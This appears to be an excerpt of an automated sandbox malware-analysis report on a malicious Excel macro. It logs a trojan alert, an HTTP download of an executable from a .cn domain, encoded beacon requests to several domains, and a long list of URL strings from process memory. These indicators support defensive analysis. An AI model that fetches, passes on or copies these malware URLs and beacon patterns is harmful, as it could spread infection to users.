          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 185.26.106.165:80
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=bczMUAuUcHXQfOtoDA3FaFpfgVKghqiBPueyWD+LhAeNSODQxsbOhA9E/efN84iGcDGK0Q==&tB=TtdpPpwhOlt HTTP/1.1Host: www.fixmygearfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&tB=TtdpPpwhOlt HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: medicelcoolers.cnConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD4B81AD.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: medicelcoolers.cnConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=bczMUAuUcHXQfOtoDA3FaFpfgVKghqiBPueyWD+LhAeNSODQxsbOhA9E/efN84iGcDGK0Q==&tB=TtdpPpwhOlt HTTP/1.1Host: www.fixmygearfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?1bwhC=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&tB=TtdpPpwhOlt HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: medicelcoolers.cn
          Source: explorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2193378270.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2193378270.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2187410622.0000000004CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380626235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2195454325.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2193378270.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
